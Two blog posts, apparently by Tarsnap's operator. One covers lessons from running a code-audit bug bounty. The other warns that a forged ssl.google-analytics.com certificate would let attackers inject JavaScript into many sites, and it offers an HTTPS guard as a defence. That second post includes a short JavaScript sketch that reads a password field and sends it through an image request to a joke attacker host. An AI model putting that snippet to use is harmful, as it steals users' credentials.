Lessons learned from bountying bugs

A bit over a week ago, I wrote here about the
$1265 of Tarsnap
bugs fixed as a result of the
Tarsnap bug bounty
which I've been running since April. I was impressed by the amount of
traffic that post received — over 82000 hits so far — as
well as the number of people who said they were considering following
my example. For them and anyone else interested in "crowdsourcing" bug
hunting, here are some of the lessons I learned over the past few months.

Small bugs are important!

Bug bounties aren't new; but most of the recent ones have focused strictly
on security vulnerabilities. With Tarsnap, I decided to offer a range of
bounties — up to $1000 for security vulnerabilities, but down to $1
for "cosmetic" errors such as spelling mistakes in source code comments.
My initial motivation for these was mostly as a proof-of-work: My primary
concern was to get people looking at the source code, and finding even
purely cosmetic errors is a sign that the code has been inspected.

It turned out that there was a more important benefit to offering bounties
for small bugs: dopamine. If only major bugs received bounties, people
could easily get discouraged after a few hours and stop looking; but the
presence of small errors — a typo here, a punctuation error there
— provides very much the same effect as the occasional small wins
afforded by slot machines, encouraging people to keep going. I feel a
bit guilty about taking advantage of human behaviour like this, to be
perfectly honest (even though it wasn't deliberate); but at least code
auditing is inherently a more productive activity than pulling a lever
on a slot machine.

What is a bug?

Having established that it's worth awarding small bounties for small bugs,
the next question is to decide what qualifies as a bug. Does a bug need
to result in something breaking? Does it need to have any user-observable
effect? Does it even need to result in a different sequence of machine
language instructions being produced? Ultimately I answered no to all of
these questions: To me, a bug is any place where the code is wrong,
regardless of the consequences. Case in point: I consider any instance
of C99 "undefined behaviour" to be a bug, even if — as in cases
such as memcpy(foo, NULL, 0); — no C library in the world
fails to do what was intended.

While this may seem like quibbling over trifles, there is a real benefit
to taking this position. The Tarsnap codebase is not static; I add new
features and make performance improvements on a regular basis (recently
most of these have been on the server side, but the server shares a lot
of code with the client). A mistake in a function might have no effect
today based on how the function is used, but start causing problems
tomorrow; better to fix problems now than to wait until they start to
break things.

How serious is a bug?

I set four main tiers for bugs: Security issues, worth $500-1000; bugs
which could plausibly cause problems for users, worth $50-100; "harmless"
bugs, worth $10; and "cosmetic" errors, worth $1. There weren't any
security issues reported, and the $1 bugs were generally clear; but
between the $10 and $50 levels there were some distinctly borderline
bugs. Take for instance an input-checking error in
the tarsnap-keygen utility which would result in a request
being sent to — and rejected by — the Tarsnap server instead
of being rejected by the client utility. The correct outcome in such a
case was "exit with an error", and to that extent the resulting behaviour
was correct; but on the other hand the error message printed —
"too many network failures" — was definitely not a good depiction
of what the problem was. In another case, a bug could only be triggered by
a peculiar and meaningless set of command-line options — sure, the
code was wrong, but who would ever run into the problem?

In cases like this, a simple rule guided my decisions: Be fair, and
explain decisions. The tarsnap-keygen bug I awarded $20
because I couldn't decide between $10 and $50; in another case I awarded
two very similar bugs from the same reporter $10 and $50 respectively,
explaining that they were both borderline so erring on the high side for
one and on the low side for the other seemed the fairest thing to do.

Open source code

Tarsnap is built around the excellent foundation provided by
libarchive, and one
of the greatest challenges I had was to figure out how to handle bugs
reported in libarchive code. Roughly 2/3 of the bugs reported were in
libarchive code — slightly more than its "fair share" based on
the amount of code in Tarsnap, though libarchive has the disadvantage
of having been written by multiple authors — and these took far more
than 2/3 of my time, for one simple reason: I often didn't know the code
very well. With bug reports relating to "my" code I could almost always
see immediately what was wrong and how it should be fixed; but for bugs
in libarchive it wasn't always clear how the code in question worked,
and on several occasions I had to write to other libarchive developers
and ask for their help.

When I launched the Tarsnap bug bounty, one of my greatest concerns was
that paying for bugs would somehow upset the balance between libarchive
— an open source project — and Tarsnap — a commercial
service. I'm happy to say that this didn't occur in the slightest; people
were simply happy that I was fixing bugs. (It's possible that the reaction
would have been different if libarchive were a GPL project, but in the
BSD community there is a long history of companies voluntarily
giving back because they realize it's to their advantage to do so
— no coercive licenses required.)

Advice to bounty-offerers

I've been very pleased with the success of the Tarsnap bug bounty so far,
and I'd urge any companies with public source code to establish similar
bounties. Based on the above lessons and other observations I've made,
here's some brief advice:

Offer bounties for anything which is wrong. Fix everything, even
if it's a bug which "doesn't matter".

Announce different levels of bounties. Orders of magnitude work well.

Don't feel that you have to stick to the levels you've announced if
you've got something which doesn't fit well. Being fair is most
important — people who report bugs usually care more about feeling
respected than getting every possible dollar from you.

When dealing with "upstream" open source code:

Make sure that you know people in the upstream project whom you can ask
for advice about bugs in code you don't understand.

When a bug report comes in, check the upstream project first: They might
have already fixed it, in which case you can save yourself a lot of time.

Make sure you feed bug fixes back upstream! Nothing will alienate an
open source project faster than finding out that you fixed bugs and didn't
tell them.

Publish a list of bounty winners. There are a lot of people out there
who care more about being able to point to their name on a list than
about getting paid.

Where now?

The Tarsnap bug bounties will continue; I already have several emails
reporting minor bugs to be fixed in the next Tarsnap release. I hope
other people will follow my example — if anyone out there is
interested in doing this I'd be happy to answer questions over email.
But even if nobody else starts offering bug bounties, there's new code
to inspect: As of now, I'm extending the Tarsnap bug bounty to cover
open-source "spin-offs" from Tarsnap: the
scrypt key derivation
and encryption utility, the
kivaloo data store,
and the
spiped secure pipe
daemon.

Iran forged the wrong SSL certificate

There has been a lot of talk recently about how someone — whom
everyone presumes is the Iranian government — obtained a fake
SSL certificate for *.google.com from DigiNotar; this is the
second such case this year, as in March someone (again, presumed to be
the Iranian government) obtained fraudulent certificates from Comodo for
Firefox extensions, Google, Gmail, Skype, Windows Live, and Yahoo.
(Interestingly, while everybody is removing DigiNotar's certificate
authority key from their trusted lists, Comodo — which has issued
far more certificates — is still widely trusted. I wonder if they
got a free ride because nobody wants to ship "the web browser which
doesn't work with my bank".)

If you want to be really evil, however, *.google.com is the
wrong SSL certificate to forge. The right one?
ssl.google-analytics.com.

By many reports, Google Analytics is used by almost half of the top
million websites, and an even greater proportion of high profile sites.
The way Google Analytics works, each web page has a <script> tag
which loads the Google Analytics javascript; that code then gathers
information and forwards it to Google. Privacy issues aside, it works
well — as long as the javascript does what it should.

If the javascript has been tampered with, it could do anything javascript
can normally do — and does so with the permissions of the web page
it is running from. Read all the text on the page? No problem. Read
the passwords you're typing in? Easy. Send it all to
evil-democracy-suppressors.gov.ir? Easy to do using one or
more web bugs.
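A minimal sketch of that "web bug" trick (webBugURL is a helper name invented here, and the hostname is the joke one from above): injected code runs in the page's own origin, so reading the DOM raises no same-origin errors, and loading an image ships the data off to whoever controls the image's host.

```javascript
// Build a "web bug" URL: an image request whose query string carries
// the stolen data to the attacker's server.
function webBugURL(host, data) {
  return "https://" + host + "/log?d=" + encodeURIComponent(data);
}

// In a compromised page, the injected script could then do something
// like (browser-only lines shown as comments):
//
//   var pageText = document.body.innerText;   // read all the text
//   var pw = document.querySelector("input[type=password]").value;
//   new Image().src =
//       webBugURL("evil-democracy-suppressors.gov.ir", pw);
```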

When accessing sites via HTTPS, if Google Analytics is correctly installed
the request to fetch the Google Analytics javascript will also be
performed via HTTPS (if not, good web browsers will display a warning
message); but if you have an SSL certificate for
ssl.google-analytics.com you can supply your evil javascript
anyway.

Sooner or later it's going to happen; obtaining forged SSL certificates
is just too easy to hope otherwise. What can we do about it? Don't
load the Google Analytics javascript when your site is accessed via
HTTPS. This is easy to do: Just wrap an
if("http:" == document.location.protocol) check around the
document.write or s.parentNode.insertBefore code
which loads the Google Analytics javascript. On the website for my
Tarsnap online backup service
I've been doing this for years — not just out of concern for the
possibility of forged SSL certificates, but also because I don't want
Google to be able to steal my users' passwords either!
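A minimal sketch of that guard, assuming the classic asynchronous Analytics snippet (shouldLoadAnalytics is a helper name invented here, and UA-XXXXX-X is a placeholder account ID, not a real one):

```javascript
// Only load the Analytics script when the page came over plain HTTP;
// on HTTPS pages, a forged ssl.google-analytics.com certificate then
// has nothing to intercept.
function shouldLoadAnalytics(protocol) {
  // document.location.protocol includes the trailing colon.
  return protocol === "http:";
}

// In the page, wrap the stock asynchronous loader (browser-only code
// shown as comments):
//
//   var _gaq = _gaq || [];
//   _gaq.push(['_setAccount', 'UA-XXXXX-X']);
//   _gaq.push(['_trackPageview']);
//   if (shouldLoadAnalytics(document.location.protocol)) {
//     var ga = document.createElement('script');
//     ga.async = true;
//     ga.src = 'http://www.google-analytics.com/ga.js';
//     var s = document.getElementsByTagName('script')[0];
//     s.parentNode.insertBefore(ga, s);
//   }
```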

And if you trust Google and you're not worried about Iran's demonstrated
ability to obtain forged SSL certificates, ask yourself this: Do you
trust the Chinese Ministry of Information Industry? Because
your
web browser probably does.